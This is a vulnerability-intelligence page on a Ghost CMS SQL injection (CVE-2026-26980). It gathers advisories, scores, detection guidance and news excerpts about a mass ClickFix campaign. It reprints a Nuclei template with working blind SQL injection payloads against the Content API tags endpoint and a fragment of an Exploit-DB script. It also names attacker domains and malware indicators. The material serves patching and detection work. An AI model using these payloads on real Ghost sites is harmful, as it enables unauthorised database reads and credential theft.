CVE-2026-26980
published 2026-02-20CVE-2026-26980: Ghost is a Node.js content management system. Versions 3.24.0 through 6.19.0 allow unauthenticated attackers to perform arbitrary reads from the database. This…
PriorityP187high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
70.00%
99.3th percentile
Ghost is a Node.js content management system. Versions 3.24.0 through 6.19.0 allow unauthenticated attackers to perform arbitrary reads from the database. This issue has been fixed in version 6.19.1.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ghost | ghost | >= 3.24.0 < 6.19.1 | 6.19.1 |
| ghost | ghost | >= 3.24.0 < 6.19.1 | 6.19.1 |
| tryghost | ghost | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url{{BaseURL}}/ghost/api/content/tags/?key={{api_key}}&filter=slug:['||CASE WHEN 1=1 THEN 0 ELSE EXP(710) END||',{{first_slug}}]↗
yara↗
id: CVE-2026-26980
info:
name: Ghost CMS Content API - SQL Injection
author: domwhewell-sage
severity: critical
description: |
Ghost CMS before 6.19.1 is vulnerable to a blind SQL injection in the /ghost/api/content/tags/ endpoint via the filter parameter. This template checks for the vulnerability by sending a boolean-based payload.
impact: |
An unauthenticated attacker can extract arbitrary data from the Ghost database including user credentials, API keys, and all content, potentially leading to full compromise of the CMS.
remediation: |
Upgrade Ghost CMS to version 6.19.1 or later which uses parameterized queries for slug filter ordering.
reference:
- https://github.com/TryGhost/Ghost/security/advisories/GHSA-w52v-v783-gw97
- https://github.com/TryGhost/Ghost/commit/30868d632b2252b638bc8a4c8ebf73964592ed91
- https://nvd.nist.gov/vuln/detail/CVE-2026-26980
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
cvss-score: 9.4
cve-id: CVE-2026-26980
epss-score: 0.32738
epss-percentile: 0.96881
cwe-id: CWE-89
cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:*
metadata:
verified: true
max-request: 5
vendor: ghost
product: ghost
framework: node.js
shodan-query: http.component:"Ghost"
fofa-query: app="Ghost"
tags: cve,cve2026,ghost,ghostcms,sqli,vuln
flow: |
http(1) && http(2) && http(3)
http:
- id: extract-api-key
method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 2
extractors:
- type: regex
name: api_key
part: body
group: 1
regex:
- 'data-key="([a-f0-9]{20,})"'
internal: true
- id: extract-first-slug
method: GET
path:
- "{{BaseURL}}/ghost/api/content/tags/?key={{api_key}}&filter=slug:-null"
extractors:
- type: json
part: body
name: first_slug
json:
- '.tags[0].slug'
internal: true
- id: check-sqli
method: GET
path:
- "{{BaseURL}}/ghost/api/content/tags/?key={{api_key}}&filter=slug:['||CASE WHEN 1=1 THEN 0 ELSE EXP(710) END||',{{first_slug}}]"
- "{{BaseURL}}/ghost/api/content/tags/?key={{api_key}}&filter=slug:['||CASE WHEN 1=0 THEN 0 ELSE EXP(710) END||',{{first_slug}}]"
matchers:
- type: dsl
dsl:
- "len(body_1) != len(body_2)"- →Detect exploitation attempts by monitoring GET requests to /ghost/api/content/tags/ where the 'filter' parameter contains SQL injection patterns such as CASE WHEN, EXP(710), or abs(-9223372036854775808) — the boolean-based blind SQLi oracle payloads used by the public PoC and Nuclei template. ↗
- →Hunt for injected JavaScript loaders at the bottom of Ghost CMS article pages that fetch second-stage code from external domains, particularly referencing clo4shara[.]xyz/11z77u3.php. ↗
- →Alert on Ghost Admin API calls (POST/PATCH to /ghost/api/admin/posts/ or /ghost/api/admin/themes/) that originate from unexpected IPs or occur outside normal publishing windows — these may indicate stolen Admin API key abuse. ↗
- →Detect ClickFix payload delivery: monitor for PowerShell processes spawned from Windows Run dialog (explorer.exe → cmd.exe/powershell.exe) downloading DLL files and executing them via rundll32.exe. ↗
- →Hunt for the Grape/UtilifySetup Electron malware persistence path C:\Users\<user>\AppData\Local\SuperMaxionQuickMaxlite and the mutex electron.app.Grape on Windows endpoints. ↗
- →Detect C2 beaconing: look for periodic (every 30 seconds) outbound HTTP/HTTPS connections to web-telegram[.]ug from Electron-based processes (Grape.exe). ↗
- →Use Shodan query http.component:"Ghost" or FOFA query app="Ghost" to identify internet-exposed Ghost CMS instances for proactive patching and attack surface reduction. ↗
- →Maintain a 30-day record of Ghost admin API call logs to enable retrospective investigation of unauthorized API key usage. ↗
- ·The vulnerability only affects Ghost CMS versions 3.24.0 through 6.19.0; version 6.19.1 and later are patched. Rotating all previously used admin API keys is required even after patching, as keys may have been exfiltrated. ↗
- ·The cloaking script actively fingerprints visitors and serves benign content to security scanners and crawlers, meaning automated scanning of compromised pages may not reveal the injected malicious JavaScript. ↗
- ·At least two distinct threat clusters are operating this campaign; some sites have been re-infected with different scripts after cleanup, or one cluster has replaced the other's injected script. A single cleanup pass may be insufficient. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
TryGhost up to 6.19.0 sql injection (GHSA-w52v-v783-gw97 / EDB-52555)
vuldb·2026-05-27·CVSS 7.5
CVE-2026-26980 [HIGH] TryGhost up to 6.19.0 sql injection (GHSA-w52v-v783-gw97 / EDB-52555)
A vulnerability has been found in TryGhost Ghost up to 6.19.0 and classified as critical. Impacted is an unknown function. This manipulation causes sql injection.
This vulnerability is tracked as CVE-2026-26980. The attack is possible to be carried out remotely. Moreover, an exploit is present.
The affected component should be upgraded.
OSV
Ghost has a SQL injection in Content API
osv·2026-02-18
CVE-2026-26980 [CRITICAL] Ghost has a SQL injection in Content API
Ghost has a SQL injection in Content API
### Impact
A SQL injection vulnerability existed in Ghost's Content API that allowed unauthenticated attackers to read arbitrary data from the database.
### Vulnerable Versions
This vulnerability is present in Ghost v3.24.0 to v6.19.0.
### Patches
v6.19.1 contains a fix for this issue.
### Workarounds
There is no application-level workaround. The Content API key is public by design, so restricting key access does not mitigate this vulnerability.
As a temporary mitigation, a reverse proxy or WAF rule can be used to block Content API requests containing `slug%3A%5B` or `slug:[` in the query string filter parameter. Note that this may break legitimate slug filter functionality.
### References
We thank Nicholas Carlini using Claude, Anthropic
GHSA
Ghost has a SQL injection in Content API
ghsa·2026-02-18
CVE-2026-26980 [CRITICAL] CWE-89 Ghost has a SQL injection in Content API
Ghost has a SQL injection in Content API
### Impact
A SQL injection vulnerability existed in Ghost's Content API that allowed unauthenticated attackers to read arbitrary data from the database.
### Vulnerable Versions
This vulnerability is present in Ghost v3.24.0 to v6.19.0.
### Patches
v6.19.1 contains a fix for this issue.
### Workarounds
There is no application-level workaround. The Content API key is public by design, so restricting key access does not mitigate this vulnerability.
As a temporary mitigation, a reverse proxy or WAF rule can be used to block Content API requests containing `slug%3A%5B` or `slug:[` in the query string filter parameter. Note that this may break legitimate slug filter functionality.
### References
We thank Nicholas Carlini using Claude, Anthropic
VulnCheck
ghost ghost Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2026·CVSS 7.5
CVE-2026-26980 [HIGH] ghost ghost Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
ghost ghost Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Ghost is a Node.js content management system. Versions 3.24.0 through 6.19.0 allow unauthenticated attackers to perform arbitrary reads from the database. This issue has been fixed in version 6.19.1.
Affected: ghost ghost
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://blog.xlab.qianxin.com/ghost-cms-mass-compromised-via-cve-2026-26980-now-fueling-clickfix-attacks/
Exploit PoC: https://vulncheck.com/xdb/dd6e9d67d76c; https://vulncheck.com/xdb/2413deb927b7
No detection rules found.
Exploit-DB
Ghost CMS 6.19.0 - SQLi
exploitdb·2026-05-07·CVSS 7.5
CVE-2026-26980 [HIGH] Ghost CMS 6.19.0 - SQLi
Ghost CMS 6.19.0 - SQLi
---
# Exploit Title: Ghost CMS 6.19.0 - SQLi
# Date: 2026-03-30
# Exploit Author: Maksim Rogov
# Exploit Licence: GPL-3.0
# Software Link: https://ghost.org/
# Version: Ghost >=3D 3.24.0, bool:
try:
if self.manual_key and self.manual_path:
self.api_key =3D self.manual_key
self.endpoint =3D urljoin(self.target, self.manual_path)
if not self.endpoint.endswith('/'): self.endpoint +=3D '/'
else:
r =3D self.session.get(self.target, timeout=3D10)
self.api_key =3D re.search(r'data-key=3D"([a-f0-9]+)"', r.t=
ext).group(1)
api_raw =3D re.search(r'data-api=3D"([^"]+)"', r.text).grou=
p(1)
path =3D urlparse(api_raw).path
self.endpoint =3D urljoin(self.target, path)
if not self.endpoint.endswith('/'): self.endpoint +=3D '/'
r_tags =3D self.session.get(f"{self.endpoint}tags/?
Nuclei
Ghost CMS Content API - SQL Injection
nuclei·CVSS 7.5
CVE-2026-26980 [HIGH] Ghost CMS Content API - SQL Injection
Ghost CMS Content API - SQL Injection
Ghost CMS before 6.19.1 is vulnerable to a blind SQL injection in the /ghost/api/content/tags/ endpoint via the filter parameter. This template checks for the vulnerability by sending a boolean-based payload.
Template:
id: CVE-2026-26980
info:
name: Ghost CMS Content API - SQL Injection
author: domwhewell-sage
severity: critical
description: |
Ghost CMS before 6.19.1 is vulnerable to a blind SQL injection in the /ghost/api/content/tags/ endpoint via the filter parameter. This template checks for the vulnerability by sending a boolean-based payload.
impact: |
An unauthenticated attacker can extract arbitrary data from the Ghost database including user credentials, API keys, and all content, potentially leading to full compromise of the CMS.
remediat
Recorded Future
May 2026 CVE Landscape
blogs_recorded_future·2026-06-08
CVE-2026-26980 May 2026 CVE Landscape
## May 2026 CVE Landscape
In May 2026, Insikt Group® identified 41 high-impact vulnerabilities that should be prioritized for remediation , all of which had a Very Critical Recorded Future Risk Score. This represents an 11% increase from last month.
These vulnerabilities affected products from 20 vendors. 21 of the 41 vulnerabilities were included in the US Cybersecurity and Infrastructure Security Agency (CISA)’s Known Exploited Vulnerabilities (KEV) catalog, 19 were surfaced through honeypot data, and one was reported by a cybersecurity vendor.
The 41 vulnerabilities in this report affected products from 20 vendors. Vercel accounted for approximately 27% of the vulnerabilities, driven by honeypot-sourced Next.js activity. The remaining exposure was concentrated across a range of enter
Checkpoint
1st June – Threat Intelligence Report
blogs_checkpoint·2026-06-01
CVE-2026-48131 1st June – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 1st June – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 1st June, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
Carnival Corporation, a global cruise line operator, has confirmed a data breach affecting nearly 6 million people after attackers used social engineering to compromise an employee account. Exposed information may include names, contact details, dates of birth, and government identification numbers.
Charter Communications, a US t
Hackernews
Ghost CMS CVE-2026-26980 Exploited to Hijack 700+ Sites for ClickFix Attacks
blogs_hackernews·2026-05-25·CVSS 7.5
CVE-2026-26980 [HIGH] Ghost CMS CVE-2026-26980 Exploited to Hijack 700+ Sites for ClickFix Attacks
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## Ghost CMS CVE-2026-26980 Exploited to Hijack 700+ Sites for ClickFix Attacks
Threat actors are exploiting a recently disclosed critical security flaw in Ghost CMS to inject malicious JavaScript code with an aim to fuel ClickFix attacks.
According to QiAnXin XLab, the activity involves the exploitation of CVE-2026-26980 (CVSS score: 9.4), an SQL injection vulnerability in Ghost's Content API that could allow an unauthenticated attacker to read arbitrary data from the database. The security flaw was addressed in February 2026 in version 6.19.1. The vulnerability was discovered by Anthropic using Claude.
What makes the vulnera
Bleepingcomputer
Ghost CMS SQL injection flaw exploited in large-scale ClickFix campaign
blogs_bleepingcomputer·2026-05-24·CVSS 7.5
CVE-2026-26980 [HIGH] Ghost CMS SQL injection flaw exploited in large-scale ClickFix campaign
## Ghost CMS SQL injection flaw exploited in large-scale ClickFix campaign
## Bill Toulas
A large-scale campaign is exploiting a critical SQL injection vulnerability (CVE-2026-26980) in Ghost CMS to inject malicious JavaScript code that triggers ClickFix attack flows.
The campaign was discovered by XLab threat intelligence researchers at Chinese cybersecurity company Qianxin, who confirmed impact on more than 700 domains, including university portals, AI/SaaS companies, media outlets, fintech firms, security sites, and personal blogs.
According to the researchers, threat actors planted malicious code on the websites of Harvard University, Oxford University, Auburn University, and DuckDuckGo.
CVE-2026-26980 impacts Ghost 3.24.0 through 6.19.0, and allows unauthenticated attackers to re
Hackernews
⚡ Weekly Recap: Vercel Hack, Push Fraud, QEMU Abused, New Android RATs Emerge & More
blogs_hackernews·2026-04-20
CVE-2026-20184 ⚡ Weekly Recap: Vercel Hack, Push Fraud, QEMU Abused, New Android RATs Emerge & More
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## ⚡ Weekly Recap: Vercel Hack, Push Fraud, QEMU Abused, New Android RATs Emerge & More
Monday’s recap shows the same pattern in different places. A third-party tool becomes a way in, then leads to internal access. A trusted download path is briefly swapped to deliver malware. Browser extensions act normally while pulling data and running code. Even update channels are used to push payloads. It’s not breaking systems—it’s bending trust.
There’s also a shift in how attacks run. Slower check-ins, multi-stage payloads, andmore code kept in memory. Attackers lean on real tools and normal workflows instead of custom builds. Some cas
Wiz
CVE-2026-26980 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.4
CVE-2026-26980 [CRITICAL] CVE-2026-26980 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26980 :
JavaScript vulnerability analysis and mitigation
Ghost is a Node.js content management system. Versions 3.24.0 through 6.19.0 allow unauthenticated attackers to perform arbitrary reads from the database. This issue has been fixed in version 6.19.1.
Source : NVD
## 7.5
Score
Published February 20, 2026
Severity HIGH
CNA Score 9.4
Affected Technologies
JavaScript
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 96.4
Exploitation Probability (EPSS) 27.5
Affected packages and libraries
ghost
Sources
NVD
npm Severity CRITICAL Has Fix Added at: Feb 19, 2026
Nix Severity HIGH Has Fix Added at: Feb 24, 2026
## Get a CVE risk assessment
Get a prioritized vi
2026-02-20
Published
Exploited in the wild